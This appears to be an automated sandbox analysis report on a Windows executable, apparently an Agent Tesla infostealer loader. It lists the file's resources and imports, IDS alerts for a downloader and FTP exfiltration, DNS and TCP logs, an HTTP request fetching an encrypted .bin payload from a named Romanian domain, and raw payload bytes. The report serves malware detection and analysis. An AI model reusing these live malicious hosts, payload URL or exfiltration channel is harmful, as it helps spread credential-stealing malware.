                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x544780x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.22763484924697458
                                                RT_ICON0x964a00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.3088844197326393
                                                RT_ICON0xa6cc80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3727664494429262
                                                RT_ICON0xb01700x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.39755083179297596
                                                RT_ICON0xb55f80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3831483230987246
                                                RT_ICON0xb98200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.44927385892116184
                                                RT_ICON0xbbdc80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4856941838649156
                                                RT_ICON0xbce700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5738272921108742
                                                RT_ICON0xbdd180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7107400722021661
                                                RT_ICON0xbe5c00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3926829268292683
                                                RT_ICON0xbec280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4718208092485549
                                                RT_ICON0xbf1900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6427304964539007
                                                RT_ICON0xbf5f80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.4932795698924731
                                                RT_ICON0xbf8e00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5709459459459459
                                                RT_DIALOG0xbfa080x100dataEnglishUnited States0.5234375
                                                RT_DIALOG0xbfb080x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0xbfc280xc4dataEnglishUnited States0.5918367346938775
                                                RT_DIALOG0xbfcf00x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0xbfd500xcadataEnglishUnited States0.6237623762376238
                                                RT_VERSION0xbfe200x2b8COM executable for DOSEnglishUnited States0.507183908045977
                                                RT_MANIFEST0xc00d80x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
                                                DLLImport
                                                ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-10-03T10:51:39.704429+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449736109.73.128.91443TCP
                                                2024-10-03T10:51:43.838009+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449737185.146.87.12821TCP
                                                2024-10-03T10:51:44.445474+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449738185.146.87.12849543TCP
                                                2024-10-03T10:51:44.450939+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449738185.146.87.12849543TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 3, 2024 10:51:38.522793055 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:38.522846937 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:38.522927046 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:38.537669897 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:38.537703991 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.356156111 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.356245995 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.398505926 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.398542881 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.399420977 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.399482012 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.403275967 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.447405100 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.704508066 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.704591990 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.704631090 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.704658031 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.704693079 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.704716921 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.704737902 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.704793930 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.834139109 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.834271908 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.836910009 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.836991072 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.840528011 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.840606928 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.879329920 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.879549980 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.966556072 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.966639996 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.968545914 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.968625069 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.972690105 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.972758055 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.975442886 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.975517035 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.978010893 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.978087902 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:39.980581045 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:39.980663061 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.011904001 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.011982918 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.019654989 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.019737005 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.099271059 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.099421978 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.101260900 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.101340055 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.103807926 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.103890896 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.106381893 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.106462002 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.108449936 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.108525991 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.110503912 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.110585928 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.112580061 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.112662077 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.113924026 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.113997936 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.115940094 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.116015911 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.117749929 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.117830038 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.119411945 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.119484901 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.120979071 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.121052980 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.144979954 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.145065069 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.146476984 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.146574020 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.152355909 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.152434111 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.186544895 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.186629057 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.188255072 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.188338041 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.188966036 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.189016104 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.189029932 CEST44349736109.73.128.91192.168.2.4
                                                Oct 3, 2024 10:51:40.189073086 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.189100027 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:40.189126015 CEST49736443192.168.2.4109.73.128.91
                                                Oct 3, 2024 10:51:41.797264099 CEST4973721192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:41.802124023 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:41.805430889 CEST4973721192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:42.436698914 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:42.436996937 CEST4973721192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:42.442014933 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:42.653009892 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:42.653280020 CEST4973721192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:42.658206940 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:42.915069103 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:42.917260885 CEST4973721192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:42.922247887 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:43.133241892 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:43.137435913 CEST4973721192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:43.142267942 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:43.353231907 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:43.355113029 CEST4973721192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:43.359884977 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:43.571044922 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:43.571270943 CEST4973721192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:43.576174974 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:43.831985950 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:43.833060026 CEST4973849543192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:43.837897062 CEST4954349738185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:43.837980032 CEST4973849543192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:43.838009119 CEST4973721192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:43.842792034 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:44.445097923 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:44.445473909 CEST4973849543192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:44.445559025 CEST4973849543192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:44.450418949 CEST4954349738185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:44.450881004 CEST4954349738185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:44.450938940 CEST4973849543192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:44.494263887 CEST4973721192.168.2.4185.146.87.128
                                                Oct 3, 2024 10:51:44.662170887 CEST2149737185.146.87.128192.168.2.4
                                                Oct 3, 2024 10:51:44.712819099 CEST4973721192.168.2.4185.146.87.128
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 3, 2024 10:51:38.341543913 CEST5827053192.168.2.41.1.1.1
                                                Oct 3, 2024 10:51:38.512999058 CEST53582701.1.1.1192.168.2.4
                                                Oct 3, 2024 10:51:41.694629908 CEST5078553192.168.2.41.1.1.1
                                                Oct 3, 2024 10:51:41.790115118 CEST53507851.1.1.1192.168.2.4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 3, 2024 10:51:38.341543913 CEST192.168.2.41.1.1.10xac18Standard query (0)www.corella.roA (IP address)IN (0x0001)false
                                                Oct 3, 2024 10:51:41.694629908 CEST192.168.2.41.1.1.10x763aStandard query (0)ftp.rusticpensiune.roA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 3, 2024 10:51:38.512999058 CEST1.1.1.1192.168.2.40xac18No error (0)www.corella.rocorella.roCNAME (Canonical name)IN (0x0001)false
                                                Oct 3, 2024 10:51:38.512999058 CEST1.1.1.1192.168.2.40xac18No error (0)corella.ro109.73.128.91A (IP address)IN (0x0001)false
                                                Oct 3, 2024 10:51:41.790115118 CEST1.1.1.1192.168.2.40x763aNo error (0)ftp.rusticpensiune.ro185.146.87.128A (IP address)IN (0x0001)false
                                                • www.corella.ro
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449736109.73.128.914437860C:\Windows\SysWOW64\msiexec.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-03 08:51:39 UTC195OUTGET /bazyland/whwWkpNOyoMrBlLiWEjvE44.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: www.corella.ro
                                                Cache-Control: no-cache
                                                2024-10-03 08:51:39 UTC223INHTTP/1.1 200 OK
                                                Date: Thu, 03 Oct 2024 08:51:40 GMT
                                                Server: Apache
                                                Last-Modified: Thu, 03 Oct 2024 07:06:42 GMT
                                                Accept-Ranges: bytes
                                                Content-Length: 241216
                                                Connection: close
                                                Content-Type: application/octet-stream
                                                2024-10-03 08:51:39 UTC7969INData Raw: 53 1a 4f 30 42 4b 30 6f f3 88 41 ab e7 58 a7 86 0c 48 b1 2d 15 84 35 7e 4c 9a 1c 24 e8 30 59 f9 44 63 80 33 d8 da 51 e8 21 f9 ec 37 39 51 4e 3a ac d1 2b 92 cf 5b 82 f2 9b 9e 0e a1 7f 63 70 d2 9c fe 20 8a 5e af 60 3a 4b 64 bf 3b 48 48 99 2f 1b 68 a8 6c 95 f2 a9 11 11 37 a5 40 a4 df 1f f3 ad 7d af 3c 96 84 7e 37 22 58 4a ec 7a 49 8e 0e af 03 eb c9 d9 cf 73 cd 0f 27 be 7b fb 7c 42 4d a0 86 8d 83 4c fb 37 92 4b b2 e4 18 81 d9 f0 9d cb 51 09 9f af 60 58 a0 38 ad b2 4a 0a 24 23 d5 05 a4 55 cf 41 79 3b 28 76 fe b3 04 26 b6 87 bc cc 44 15 31 ee d3 be 47 08 dc 28 23 0f 8d 8f f0 16 43 69 0f 72 f1 2c 2b 9f 66 a3 52 0f 95 fd fd 6d 1d 3b af 01 79 df d6 4c 8d dd 9d 83 b7 07 ac 1f 40 ec 8a f9 02 f3 ee 3b a7 79 e7 17 cf a6 28 c9 86 fb 56 c9 90 25 29 b7 d6 b5 5c 07 ee 62
                                                Data Ascii: SO0BK0oAXH-5~L$0YDc3Q!79QN:+[cp ^`:Kd;HH/hl7@}<~7"XJzIs'{|BML7KQ`X8J$#UAy;(v&D1G(#Cir,+fRm;yL@;y(V%)\b
                                                2024-10-03 08:51:39 UTC8000INData Raw: c9 80 42 17 cb 09 27 47 a8 12 ad 93 ac 86 df 2e 8e 8e 47 aa e5 56 b2 43 74 e1 6f 81 b9 11 5c b4 c9 68 d2 0b 5f 13 c8 e0 03 db 01 0b 34 0c 32 ba 00 6b 3c 6f ca 95 92 45 94 44 4a 6a d7 a6 94 d6 0d 00 33 c2 ac d0 05 66 16 fd 28 cf 74 84 56 fa df ae b9 bc 05 bc 5c 24 75 1b e1 5d 12 d0 cf 8c f0 ae 4b 42 56 48 16 5a 18 06 f5 22 cd f8 0c 7b f1 01 07 70 bc 5c 87 10 3f 83 0c a5 dc df ee 77 ea 87 d9 46 c2 41 c5 6d 86 7c 9a 60 56 26 2f df 3c bf b3 cc 08 02 7b 3b 4f 46 c0 f3 22 1d 0b 90 93 6d 6b 73 53 4d a1 33 ab 8a 04 89 d8 a8 56 ff dd b6 ea dc ed 9c be e0 24 bd ca 66 e5 32 c0 dc 9b 85 fe bb f5 33 d4 0d ff 33 d3 aa 37 60 76 71 54 d4 b7 e6 5b df a7 b0 8a a3 a3 63 3a 6f 6b bf 3b b7 49 98 16 be 68 a8 6c 6b fe a8 11 71 3a a5 40 a4 ff 1d f3 ad 7d 87 38 94 84 78 95 02 48
                                                Data Ascii: B'G.GVCto\h_42k<oEDJj3f(tV\$u]KBVHZ"{p\?wFAm|`V&/<{;OF"mksSM3V$f2337`vqT[c:ok;Ihlkq:@}8xH
                                                2024-10-03 08:51:39 UTC8000INData Raw: 80 23 42 24 4b 52 99 63 12 83 3c 61 86 f4 84 0f 69 24 c9 06 dc 23 d1 b6 ff 00 43 20 43 fe 08 81 ec b5 de 84 72 19 4b f4 c8 11 8c 8f 18 18 e9 de 73 c6 c8 19 98 b4 5e 5b 8e c1 26 e0 6d 0b c0 17 4c c0 d5 0a 0f ba 37 a2 70 8b de 42 63 51 e5 1a 62 37 15 98 57 56 80 e5 c8 23 f2 7c f0 76 13 29 e8 11 40 8a 75 79 3c 3b 59 74 9b af 24 e3 68 a1 fc 33 c4 9b 21 d4 f1 85 46 37 cc 31 cc bb a9 e3 51 9f ac 78 a1 d1 8f ae 37 82 ff 56 4c 48 67 eb 6f 92 89 15 7c cc ca 68 d2 f3 51 11 d9 c0 fd d7 03 0b ea 0a 31 ba 38 f4 3e 56 cf 95 6c 49 af 41 6a 60 d7 9e 75 d5 f3 c6 01 c2 ac d3 cb 6e 17 5a 1a c7 74 85 56 88 c9 8c b9 cc a7 9c a9 2a 75 1b 27 c0 03 d0 cf 72 02 a1 4b 62 77 50 16 5a e6 f9 cd 0c da f8 0c 5b 00 08 06 70 11 4f 87 10 3e 3d 4e a2 dc ff cc 6e ea 87 27 b6 cf 41 c5 93 74
                                                Data Ascii: #B$KRc<ai$#C CrKs^[&mL7pBcQb7WV#|v)@uy<;Yt$h3!F71Qx7VLHgo|hQ18>VlIAj`unZtV*u'rKbwPZ[pO>=Nn'At
                                                2024-10-03 08:51:39 UTC8000INData Raw: de c5 56 e4 f0 31 ac e1 7e 2e 0e 4a a6 e5 22 49 b9 3a e8 2b 13 c1 4a 23 8d df 8b 8f 1d 22 01 4f ce 4a 7d 7e 72 ed 24 62 dd 02 7b db cb 05 0d 9a cf a4 79 ea 46 8d a5 c6 26 9d 6f 48 b6 02 4b 74 a9 9c 92 80 d9 b4 a1 22 be 3a cc cd ad 1d ec ab 25 1e b1 98 c9 26 b1 88 22 37 6d d8 ca be bd 4a 0a dc d4 08 e9 b0 78 93 8a aa 79 48 26 64 7e 04 c6 b9 23 59 1e 8f 8c 23 30 eb 4e 52 e9 c1 12 8e 05 64 ae ec 84 37 66 59 bc 06 e4 ed 0e 4f 00 fe 4a de 4d d4 57 81 12 bf 01 8e 52 1e 4b 0a c1 ef 8d 9e 7e 18 e9 d4 51 e5 c8 19 66 bc 4e 5b f5 b1 26 a4 69 78 e7 17 46 c4 f5 02 0f a9 07 5e 7e aa da 42 9d 49 e7 1a 53 11 15 98 57 a8 7f d2 ef 23 ca 7a 0a 7f 13 29 33 66 31 8a 55 71 c2 32 59 8a e1 e3 33 e3 6c 89 18 3f c4 91 2f 51 f1 85 44 78 a1 30 cc bd 77 e0 53 9f ac 78 a3 d2 8f 8e c9
                                                Data Ascii: V1~.J"I:+J#"OJ}~r$b{yF&oHKt":%&"7mJxyH&d~#Y#0NRd7fYOJMWRK~QfN[&ixF^~BISW#z)3f1Uq2Y3l?/QDx0wSx
                                                2024-10-03 08:51:39 UTC8000INData Raw: 6a ee 4a c8 d2 39 5c 71 99 9c f8 5e 43 5a f4 59 83 de 49 64 f7 6c 13 3d d2 57 d5 6e de 4e b0 58 9a b1 c9 93 dc fc aa f9 43 6c 85 4c 1f bc 63 77 d2 ef 93 9a 54 a8 4b 70 f1 b5 20 50 8b 2c 7e ca 8d d0 55 4e b7 c4 c8 b9 0f 15 c2 6b e6 4d 71 0c ce 2b 94 66 de 7c 68 e1 c7 37 46 62 c9 b7 d1 08 d2 5f a9 44 0e be e6 9d 2e ff 8b 02 05 22 f1 a5 af cf e3 5c 94 ad b1 70 a8 ea fb cf a2 1b 72 d1 02 6e a6 dc bf 4b 47 3b 2f 2d 17 c1 25 95 ad de 81 71 13 d1 0f 6e ce 4a 83 72 8d e3 0a 6f e5 71 79 25 ca c2 04 97 cf 5a 4d e1 46 17 5b f0 9a 60 6e bb 98 02 b5 73 9c 9e e0 40 c9 b4 d1 0b a4 3a dd e7 c2 a8 ec ab d1 ee bf 9e f1 e9 bd 8e 22 58 25 d4 ca b4 63 44 05 dc f4 f6 e8 89 72 6d 84 ba 79 50 dc 65 7e 04 c6 bb 2c 59 e0 7d 90 23 aa 35 41 55 e9 3f e0 89 3c 9f a2 eb 84 60 d6 59 bc
                                                Data Ascii: jJ9\q^CZYIdl=WnNXClLcwTKp P,~UNkMq+f|h7Fb_D."\prnKG;/-%qnJroqy%ZMF[`ns@:"X%cDrmyPe~,Y}#5AU?<`Y
                                                2024-10-03 08:51:39 UTC8000INData Raw: 40 88 35 5b ad 4b a7 a5 66 26 fe e7 78 a0 ae 9b 17 db e3 98 a8 07 0a 11 ee 24 e6 a8 5e 10 d9 d5 50 29 c2 62 7f fd 04 17 4d db af 0c 42 a8 92 b8 33 89 f6 c9 bb 1e e5 6f ab c6 6f 72 46 48 54 a9 5c 98 c4 bc e5 c7 e9 b9 13 82 8d 45 94 bb de 7a 45 b7 65 a5 54 69 2c 76 5b e5 a4 d4 1c 58 d1 8c 04 9f 7e a9 05 a6 7e d2 c5 48 b1 c7 bf 3b 94 f8 16 d8 66 9a 04 82 6a ee b4 c6 a9 7a 74 27 ea 3e d8 5a bd 56 fd a7 ad ce 49 64 09 9e 04 04 e3 56 d5 6e 20 bc b1 61 76 bf cc 93 8f 84 aa f9 49 6c 85 45 1f 9c 9f 7b db ef 4d 91 42 a8 4b 70 fc 9a 32 70 8b 2c 0d 62 73 d1 66 ba b9 c5 c8 99 29 14 c2 6b 18 bd 76 1a ce d5 66 63 c8 5c 4c e9 c7 37 b8 9d f1 9f d4 08 d2 a1 9d 45 0e 40 e8 a5 97 21 71 fd 7b 96 0f ab ac bd b8 b2 98 d4 de e5 a0 ea f1 31 52 1e 4b 21 0e 6a a6 dd e8 48 47 3b f1
                                                Data Ascii: @5[Kf&x$^P)bMB3oorFHT\EzEeTi,v[X~~H;fjzt'>ZVIdVn avIlE{MBKp2p,bsf)kvfc\L7E@!q{1RK!jHG;
                                                2024-10-03 08:51:39 UTC8000INData Raw: 5e c2 5d 85 ba 4a f7 2b a1 f9 e7 91 67 b7 b7 45 6f 91 7d 6a 92 fc 2e 13 b0 5e 7a 9d 87 6b aa c6 ec 9c 97 88 92 bf fe 1f c7 8b 7d 9e 62 d9 e2 c5 a9 61 0f f5 24 e2 61 bb 4d b2 c2 d9 e7 42 84 82 2b b6 a6 f4 ce 8c de 41 f4 d2 d0 b4 af 28 1f 46 fa 54 0e 82 57 78 2b 8d ed 93 03 48 7d 46 a5 e0 27 81 c0 7e 6e 6f 3a 5e e1 eb b9 1a c7 78 03 8b 54 a6 98 ce 73 47 41 88 a4 65 ae 4b ad 7b 6a 25 fe c7 47 9d ae 9b e9 fa de 8a a8 07 f4 3f e4 24 e6 56 ac 14 d8 f5 72 2a c2 62 81 02 33 06 4d db 51 28 90 a8 b2 be cd 87 f7 37 9a 24 ef 6f ab 38 61 58 47 48 aa a5 a8 96 e7 b9 e5 39 e5 44 12 9b 2f 44 94 bb de 77 7d b2 0a 01 54 51 23 88 55 ed 9c f6 84 a6 2e 72 f6 92 76 83 2d 0f 7e c1 ff b2 bf b6 bc c5 98 d7 16 f0 bc ba 04 88 94 e0 49 c8 5e 76 4f 71 d3 33 d8 5a 43 a4 f8 a7 8d 36 47
                                                Data Ascii: ^]J+gEo}j.^zk}ba$aMB+A(FTWx+H}F'~no:^xTsGAeK{j%G?$Vr*b3MQ(7$o8aXGH9D/Dw}TQ#U.rv-~I^vOq3ZC6G
